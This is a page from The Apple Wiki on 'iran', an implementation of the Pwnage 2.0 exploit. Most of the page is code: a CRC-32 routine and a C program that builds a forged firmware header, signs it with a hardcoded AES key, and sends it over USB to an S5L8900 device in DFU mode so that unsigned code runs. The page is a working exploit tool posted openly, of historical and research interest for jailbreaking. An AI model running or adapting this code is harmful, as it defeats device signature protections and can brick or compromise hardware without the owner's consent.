Toggle menu
Toggle personal menu
Not logged in
Your IP address will be publicly visible if you make any edits.

iran

From The Apple Wiki

iran is an implementation of the Pwnage 2.0 exploit this injected a pwnd DFU_Mode allowing custom firmware to be restored to.

External Links

pwnd dfu code for S5L8900

//======================================================== file = crc32.c =====
//=  Program to compute CRC-32 using the "table method" for 8-bit subtracts   =
//=============================================================================
//=  Notes: Uses the standard "Charles Michael Heard" code available from     =
//=         http://cell-relay.indiana.edu/cell-relay/publications/software    =
//=         /CRC which was adapted from the algorithm described by Avarm      =
//=         Perez, "Byte-wise CRC Calculations," IEEE Micro 3, 40 (1983).     =
//=---------------------------------------------------------------------------=
//=  Build:  bcc32 crc32.c, gcc crc32.c                                       =
//=---------------------------------------------------------------------------=
//=  History:  KJC (8/24/00) - Genesis (from Heard code, see above)           =
//=============================================================================
//----- Type defines ----------------------------------------------------------
typedef unsigned char      byte;    // Byte is a char
typedef unsigned short int word16;  // 16-bit word is a short int
typedef unsigned int       word32;  // 32-bit word is an int
//----- Defines ---------------------------------------------------------------
#define POLYNOMIAL 0x04c11db7L      // Standard CRC-32 ppolynomial
//----- Gloabl variables ------------------------------------------------------
unsigned long  crctable[256] =
{
0x00000000L, 0x77073096L, 0xEE0E612CL, 0x990951BAL,
0x076DC419L, 0x706AF48FL, 0xE963A535L, 0x9E6495A3L,
0x0EDB8832L, 0x79DCB8A4L, 0xE0D5E91EL, 0x97D2D988L,
0x09B64C2BL, 0x7EB17CBDL, 0xE7B82D07L, 0x90BF1D91L,
0x1DB71064L, 0x6AB020F2L, 0xF3B97148L, 0x84BE41DEL,
0x1ADAD47DL, 0x6DDDE4EBL, 0xF4D4B551L, 0x83D385C7L,
0x136C9856L, 0x646BA8C0L, 0xFD62F97AL, 0x8A65C9ECL,
0x14015C4FL, 0x63066CD9L, 0xFA0F3D63L, 0x8D080DF5L,
0x3B6E20C8L, 0x4C69105EL, 0xD56041E4L, 0xA2677172L,
0x3C03E4D1L, 0x4B04D447L, 0xD20D85FDL, 0xA50AB56BL,
0x35B5A8FAL, 0x42B2986CL, 0xDBBBC9D6L, 0xACBCF940L,
0x32D86CE3L, 0x45DF5C75L, 0xDCD60DCFL, 0xABD13D59L,
0x26D930ACL, 0x51DE003AL, 0xC8D75180L, 0xBFD06116L,
0x21B4F4B5L, 0x56B3C423L, 0xCFBA9599L, 0xB8BDA50FL,
0x2802B89EL, 0x5F058808L, 0xC60CD9B2L, 0xB10BE924L,
0x2F6F7C87L, 0x58684C11L, 0xC1611DABL, 0xB6662D3DL,
0x76DC4190L, 0x01DB7106L, 0x98D220BCL, 0xEFD5102AL,
0x71B18589L, 0x06B6B51FL, 0x9FBFE4A5L, 0xE8B8D433L,
0x7807C9A2L, 0x0F00F934L, 0x9609A88EL, 0xE10E9818L,
0x7F6A0DBBL, 0x086D3D2DL, 0x91646C97L, 0xE6635C01L,
0x6B6B51F4L, 0x1C6C6162L, 0x856530D8L, 0xF262004EL,
0x6C0695EDL, 0x1B01A57BL, 0x8208F4C1L, 0xF50FC457L,
0x65B0D9C6L, 0x12B7E950L, 0x8BBEB8EAL, 0xFCB9887CL,
0x62DD1DDFL, 0x15DA2D49L, 0x8CD37CF3L, 0xFBD44C65L,
0x4DB26158L, 0x3AB551CEL, 0xA3BC0074L, 0xD4BB30E2L,
0x4ADFA541L, 0x3DD895D7L, 0xA4D1C46DL, 0xD3D6F4FBL,
0x4369E96AL, 0x346ED9FCL, 0xAD678846L, 0xDA60B8D0L,
0x44042D73L, 0x33031DE5L, 0xAA0A4C5FL, 0xDD0D7CC9L,
0x5005713CL, 0x270241AAL, 0xBE0B1010L, 0xC90C2086L,
0x5768B525L, 0x206F85B3L, 0xB966D409L, 0xCE61E49FL,
0x5EDEF90EL, 0x29D9C998L, 0xB0D09822L, 0xC7D7A8B4L,
0x59B33D17L, 0x2EB40D81L, 0xB7BD5C3BL, 0xC0BA6CADL,
0xEDB88320L, 0x9ABFB3B6L, 0x03B6E20CL, 0x74B1D29AL,
0xEAD54739L, 0x9DD277AFL, 0x04DB2615L, 0x73DC1683L,
0xE3630B12L, 0x94643B84L, 0x0D6D6A3EL, 0x7A6A5AA8L,
0xE40ECF0BL, 0x9309FF9DL, 0x0A00AE27L, 0x7D079EB1L,
0xF00F9344L, 0x8708A3D2L, 0x1E01F268L, 0x6906C2FEL,
0xF762575DL, 0x806567CBL, 0x196C3671L, 0x6E6B06E7L,
0xFED41B76L, 0x89D32BE0L, 0x10DA7A5AL, 0x67DD4ACCL,
0xF9B9DF6FL, 0x8EBEEFF9L, 0x17B7BE43L, 0x60B08ED5L,
0xD6D6A3E8L, 0xA1D1937EL, 0x38D8C2C4L, 0x4FDFF252L,
0xD1BB67F1L, 0xA6BC5767L, 0x3FB506DDL, 0x48B2364BL,
0xD80D2BDAL, 0xAF0A1B4CL, 0x36034AF6L, 0x41047A60L,
0xDF60EFC3L, 0xA867DF55L, 0x316E8EEFL, 0x4669BE79L,
0xCB61B38CL, 0xBC66831AL, 0x256FD2A0L, 0x5268E236L,
0xCC0C7795L, 0xBB0B4703L, 0x220216B9L, 0x5505262FL,
0xC5BA3BBEL, 0xB2BD0B28L, 0x2BB45A92L, 0x5CB36A04L,
0xC2D7FFA7L, 0xB5D0CF31L, 0x2CD99E8BL, 0x5BDEAE1DL,
0x9B64C2B0L, 0xEC63F226L, 0x756AA39CL, 0x026D930AL,
0x9C0906A9L, 0xEB0E363FL, 0x72076785L, 0x05005713L,
0x95BF4A82L, 0xE2B87A14L, 0x7BB12BAEL, 0x0CB61B38L,
0x92D28E9BL, 0xE5D5BE0DL, 0x7CDCEFB7L, 0x0BDBDF21L,
0x86D3D2D4L, 0xF1D4E242L, 0x68DDB3F8L, 0x1FDA836EL,
0x81BE16CDL, 0xF6B9265BL, 0x6FB077E1L, 0x18B74777L,
0x88085AE6L, 0xFF0F6A70L, 0x66063BCAL, 0x11010B5CL,
0x8F659EFFL, 0xF862AE69L, 0x616BFFD3L, 0x166CCF45L,
0xA00AE278L, 0xD70DD2EEL, 0x4E048354L, 0x3903B3C2L,
0xA7672661L, 0xD06016F7L, 0x4969474DL, 0x3E6E77DBL,
0xAED16A4AL, 0xD9D65ADCL, 0x40DF0B66L, 0x37D83BF0L,
0xA9BCAE53L, 0xDEBB9EC5L, 0x47B2CF7FL, 0x30B5FFE9L,
0xBDBDF21CL, 0xCABAC28AL, 0x53B39330L, 0x24B4A3A6L,
0xBAD03605L, 0xCDD70693L, 0x54DE5729L, 0x23D967BFL,
0xB3667A2EL, 0xC4614AB8L, 0x5D681B02L, 0x2A6F2B94L,
0xB40BBE37L, 0xC30C8EA1L, 0x5A05DF1BL, 0x2D02EF8DL
};
//----- Prototypes ------------------------------------------------------------
word32 update_crc(word32 crc_accum, byte *data_blk_ptr, word32 data_blk_size);
//=============================================================================
//=  CRC32 generation                                                         =
//=============================================================================
word32 update_crc(word32 crc, byte *data_blk_ptr, word32 data_blk_size)
{
  register word32 i, j;
  for (j = 0; j < data_blk_size; j++) {
		crc = crctable[(crc ^ data_blk_ptr[j]) & 0xFFL] ^ (crc >> 8);
}
  return crc;
}

source code

#include "usb.h"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include "crc.h"
#include "openssl/aes.h"
#include "openssl/sha.h"
const unsigned char key837[]={0x18,0x84,0x58,0xA6,0xD1,0x50,0x34,0xDF,0xE3,0x86,0xF2,0x3B,0x61,0xD4,0x37,0x74};
void hexdump(unsigned char *a, int c) { int b; for(b=0;b<c;b++) { if(b%16==0&&b!=0) printf("\n"); printf("%2.2X ",a[b]); } printf("\n"); }
int main(int argc, char *argv[])
{
	printf("dfu unsigned execute by geohot\n");
	printf("based off the dev teams pwnage 2.0 exploit\n");
	int a;
   char buf[255];
   unsigned char *fbuf;
//building file
	if(argc<2) { printf("usage: %s <filename>\n",argv[0]); return -1; }
	FILE *cert=fopen("cert","rb");
	FILE *f=fopen(argv[1], "rb");
	if(cert==0||f==0) { printf("file not found\n"); return -1; }
	fseek(cert, 0, SEEK_END);
	int len_cert = ftell(cert);
	fseek(cert, 0, SEEK_SET);
	fseek(f, 0, SEEK_END);
	int len = ftell(f);
	fseek(f, 0, SEEK_SET);
	fbuf=malloc(0x800+len+len_cert+0x10);
	memset(fbuf,0,0x800);
	fread(&fbuf[0x800],1,len,f);
	fread(&fbuf[0x800+len],1,len_cert,cert);
	fclose(f); fclose(cert);
	printf("files read %X %X\n",len,len_cert);
	strcpy(fbuf, "89001.0"); 
	fbuf[7]=0x04;
	fbuf[0x3E]=0x04;
	memcpy(&fbuf[0xC],&len,0x4);			//data size
	memcpy(&fbuf[0x10],&len,0x4);		//sig offset
	a=len+0x80;
	memcpy(&fbuf[0x14],&a,0x4);			//cert offset
	a=0xC5E;
	memcpy(&fbuf[0x18],&a,0x4);			//cert length
	printf("header generated\n");
//hashing header
	unsigned char shaout[0x14];
	SHA1(fbuf,0x40,shaout);
	AES_KEY mkey;
	AES_set_encrypt_key(key837, 0x80, &mkey);
	unsigned char iv[0x10]; memset(iv,0,0x10);
	AES_cbc_encrypt(shaout, shaout, 0x10, &mkey, iv, AES_ENCRYPT);
	memcpy(&fbuf[0x40],shaout,0x10);
//appending dfu footer
	unsigned int crc=0xFFFFFFFF;
	const char header[]={0xff,0xff,0xff,0xff,0xac,0x05,0x00,0x01,0x55,0x46,0x44,0x10};
	memcpy(&fbuf[0x800+len+len_cert],header,0xC);
	crc=update_crc(crc, fbuf, 0x800+len+len_cert+0xC);
	for(a=0;a<4;a++) { fbuf[0x800+len+len_cert+0xC+a]=crc&0xFF; crc=crc>>8; }
//sending file
   usb_init();
  	usb_find_busses();
	usb_find_devices();
   printf("USB ready\n");
   struct usb_bus *bus;
   struct usb_device *dev;
   struct usb_dev_handle *idev=0;
   int dtype=0;
   for(bus=usb_get_busses();bus;bus=bus->next)
	{
       printf("BUS found\n");
		for(dev=bus->devices;dev;dev=dev->next)
		{
           printf(" %4.4X %4.4X\n", dev->descriptor.idVendor, dev->descriptor.idProduct);
           if(dev->descriptor.idVendor==0x5ac && dev->descriptor.idProduct==0x1222)      //DFU Mode
		{
               printf("Found DFU\n");
                idev=usb_open(dev);
                dtype=2;
            }
		}
	}
	if(idev==0) { printf("No device found\n"); return -1;}
	int c=0;
	a=0;
	printf("sending 0x%x bytes\n", (0x800+len+len_cert+0x10));
	while(a<((0x800+len+len_cert+0x10)+0x800))
	{
		int sl=((0x800+len+len_cert+0x10)-a);
		if(sl<0) sl=0;
		if(sl>0x800) sl=0x800;
		//printf("%X %X\n",a,sl);
		if(usb_control_msg(idev, 0x21, 1, c, 0, &fbuf[a], sl, 1000)==sl) printf(".");
		else printf("x");
		if(sl==0) printf("\n");
		int b=0;
		while(usb_control_msg(idev, 0xA1, 3, 0, 0, buf, 6, 1000)==6&&b<5)
		{
			b++;
			if(sl==0) hexdump(buf, 6);
			if(buf[4]==5) break;
		}
		a+=0x800;
		c++;
   }
	usb_close(idev);
	return 0;
}